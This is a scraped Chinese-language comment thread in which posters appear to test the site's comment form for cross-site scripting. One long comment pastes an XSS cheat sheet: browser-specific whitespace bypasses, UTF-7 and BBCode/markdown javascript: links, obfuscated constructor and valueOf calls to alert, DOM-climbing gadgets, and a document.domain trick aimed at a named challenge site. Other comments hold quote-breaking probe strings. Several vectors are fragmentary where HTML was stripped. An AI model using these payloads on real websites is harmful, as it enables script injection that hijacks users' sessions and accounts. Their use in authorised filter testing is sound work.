我来说两句已有16条评论,点击全部查看
我的态度:

    登录 | 注册 需要登陆才可发布评论
最新 最热
2016-11-21 11:28:28 joker(joker)
test
回复 支持1
2016-09-05 21:44:40 test(test)
lengyu 于 2015-01-12 17:30:08发布
\'\">
testasdasdasda
回复 支持1
2016-09-05 21:44:18 test(test)
lengyu 于 2015-01-12 17:30:08发布
\'\">
a
回复 支持0
2016-09-05 21:43:58 test(test)
test 于 2016-09-05 21:39:54发布
aaa1234321 于 2015-03-22 10:42:18发布
test 于 2016-09-05 21:40:41发布<a>
a
回复 支持0
2016-09-05 21:43:13 test(test)
test 于 2016-09-05 21:39:54发布
aaa1234321 于 2015-03-22 10:42:18发布
test 于 2016-09-05 21:40:41发布<a>
clickme
回复 支持0
2016-09-05 21:41:46 test(test)
test 于 2016-09-05 21:39:54发布
aaa1234321 于 2015-03-22 10:42:18发布
test 于 2016-09-05 21:40:41发布<a>
代替空格: IE所有版本 09 0A 0C 0D 20 2F chrome 09 0A 0C 0D 20 2F safari 09 0A 0C 0D 20 2F FF 09 0A 0C 0D 20 2F opera 09 0A 0C 0D 20 2F Android 09 0A 0C 0D 20 2F 代替空格相关测试payload: 属性测试: 标签测试: 关于没有闭合的script会被执行的问题 ? CLICKME CLICKME CLICKME test1 x M M M +ADw-script+AD4-alert(123); +ADw-/script+AD4- [url=javascript:alert(56)]xsstest[/url] [flash]javascript:alert(57)[/flash] [test][] [test]: javascript:alert(58) mark down2: [xss](\\ javascript:alert(1)) 调用js代码: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $(function(){ try { $(location.hash) } catch(e) {} }) link ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ document.createElement(String.fromCharCode(97)).innerHTML = \'\'; ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- M -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- \'\'.replace(\'\', alert); print() find() open() --> will make it work in any ie version CLICK ME chrome部分字符会被忽略 IE6-9突破type=hidden限制 Opera12突破type=hidden限制 javascript://www.sec-t.org/search?s=%0aalert(1) //safari opera right-click [works in Firefox] //safari hello /mobile ontouchmove untouchend also clickit firefox/opera/chrome/safari all browser opera/chrome/firefox opera/chrome/firefox chrome/opera chrome/opera/firefox chrome/safari/opera chrome/safari/opera firefox chrome/firefox/safari chrome/opera lol event handler and attribute testing: tag test: tespace = /[\\x00-\\x20\\xA0\\u1680\\u180E\\u2000-\\u2029\\u205f\\u3000]/g; javascript中,所有在单双引号中的反斜杠会被忽略: //webkit //webkit setTimeout, setInterval, new Function and eval setImmediate execScript [][$=\'\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162\'][$](\'\\141\\154\\145\\162\\164(1)\')() RuntimeObject(\"w*\")[\"window\"][\"alert\"](1); // IE parentNode.parentNode.parentNode.parentNode[\'locatio\'+\'n\']=\'javascrip\'+\'t:aler\'+\'t\'+URL[45]+\'281\'+URL[45]+\'29\' //climb to the top with parentNode $[\'__parent__\'][\'alert\'](1) //Firebug Console in FF3.6 Only (0,[][\'sort\'])()[\'alert\'](1) //FF3.6, Chrome, IE9 1.[\'__parent__\'][\'alert\'](1) //FF3.6 ([],[][\'sort\'])()[\'alert\'](1) //Chrome, FF3.6, IE9 /_/[\'__parent__\'][\'alert\'](1) //FF3.6 $[\'constructor\'](\'alert(1)\')() //JQuery Chrome, IE8, IE9, FF4, FF3.6 (0,[][\'valueOf\'])()[\'alert\'](1) //Chrome, FF3.6, IE9 (0,{}[\'valueOf\'])()[\'alert\'](1) //Chrome, FF3.6, IE9 (0||$[\'valueOf\'])()[\'alert\'](1) //JQuery Chrome, IE9, FF3.6 (1&&$[\'valueOf\'])()[\'alert\'](1) //JQuery Chrome, IE9, FF3.6 (1?$[\'valueOf\']:0)()[\'alert\'](1) //Jquery Chrome, IE9 [][\'sort\'][\'apply\']()[\'alert\'](1) //Chrome, FF3.6 (0,/0/(/0/)[\'sort\'])()[\'alert\'](1) //Chrome, FF3.6 (\'\',/\\//[\'valueOf\'])()[\'alert\'](1) //Chrome, IE9, FF3.6 (1?[\'\'][\'valueOf\']:0)()[\'alert\'](1) //Chrome, IE9 \'\'[\'big\'][\'constructor\'](\'alert(1)\')() //FF4, FF3.6 IE8, IE9, Webkit [][\'map\'][\'constructor\'](\'alert(1)\')() //FF3.6, FF4, Chrome, IE9 (1&&[][\'valueOf\'])()[\'alert\'](1) //Chrome, IE9, FF3.6 /_/[\'test\'][\'constructor\'](\'alert(1)\')() //FF3.6, FF4, Chrome, IE8, IE9 (0||[\'\'][\'valueOf\'])()[\'alert\'](1) //FF3.6, IE9, Chrome (0.[\'valueOf\'])[\'constructor\'](\'alert(1)\')() //FF3.6, FF4, IE8, IE9, Chrome 1.[\'constructor\'][\'constructor\'](\'alert(1)\')() //FF3.6, FF4, IE8, IE9, Chrome (0)[\'constructor\'][\'constructor\'](\'alert(1)\')() //FF3.6, FF4, IE8, IE9, Chrome $=\'@mozilla.org/js/function\';$::[\'alert\'](1) //FF3.6, FF4 http://sla.ckers.org/forum/read.php?2,130 //history of XSS funny stuff under firefox: raf challenge writeup2: document.head.innerHTML=URL document.all[0].innerHTML=URL document.body.innerHTML=URL document.parentNode.innerHTML document.parentElement.innerHTML document.childNodes document.childrens defaultView.document.body Script.document.body.innerHTML //IE only content.document.body.innerHTML //FF Only id=a onerror=a.ownerDocument.body.innerHTML //IE,Firefox d=attributes.src;d,ownerElement.innerHTML previousSibling.ownerDocument.body.innerHTML event.target.innerHTML arguments[0].target.innerHTML arguments[0].path[0].innerHTML event.srcElement.innerHTML event.path[0].innerHTML onerror.arguments[0].target _=new Option;_.innerHTML [new Audio][0][\'ownerDocument\'] [new Text][0][\'ownerDocument\'] [new Range][0][\'commonAncestorContainer\'] [new Range][0][\'endContainer\'] [new Range][0][\'startContainer\'] [new Option][0][\'ownerDocument\'] [new Option][0][\'lastChild\'] [new Option][0][\'firstChild\'] [new Image][0][\'ownerDocument\'] [new DocumentFragment][0][\'ownerDocument\'] [new Comment][0][\'ownerDocument\'] onload=a.innerHTML=URL onerror=a={};a[src=“logo.png”]=a=activeElement _=new Text;_.ownerDocument.body.innerHTML event.fromElement.innerHTML vbs:setTimeout “setTimeout wind”&”w.nam”&”e” //window.name=javascript:alert(1) event.target.parentElement.innerHTML v=[onerror+’’][0];attributes[1].value=‘aler’+’t’+v[16]+1+v[22];src=2 //chrome this is crazy ————————————————— safari document.domain=‘’com’ trick function go(){ document.domain=\'com\'; var w=window.open(\"https://challenges.prakharprasad.com/xss/2/xss.php?xss=%27x%27onerror=domain=%27com%27\",\"x\"); var si=setInterval(function(){ if(w.document.location.host==\'challenges.prakharprasad.com\'){ w.alert(1); clearInterval(si); } },1) } go ‘._=document.domain=‘ ————————————————————— Sending valid JSON with HTML form: ———————————————— —————————————————— Funny IE VECTOR(
回复 支持0
2016-09-05 21:40:41 test(test)
test 于 2016-09-05 21:39:54发布
aaa1234321 于 2015-03-22 10:42:18发布
<a>
回复 支持1
2016-09-05 21:39:54 test(test)
aaa1234321 于 2015-03-22 10:42:18发布
回复 支持0
2016-09-05 21:38:49 test(test)
testme
回复 支持0
2016-09-05 21:38:07 test(test)
aaa1234321 于 2015-03-22 10:42:18发布dddd123456 回复 支持(5)
回复 支持0
2016-09-05 21:37:29 test(test)
atag test: z
回复 支持0
2016-09-05 21:32:57 test(test)
\'\"a\\
回复 支持0
2016-03-14 17:12:56 demozx(demozx)
www.kejitianxia.com
回复 支持2
2015-08-04 09:44:10 Anny_123456(njy123456)
aaa1234321 于 2015-03-22 10:42:18发布
dddd
123456
回复 支持5
2015-03-22 10:42:18 111234ff(aaa1234321)
dddd
回复 支持12
2015-01-12 17:30:08 awfad(lengyu)
\'\">
回复 支持8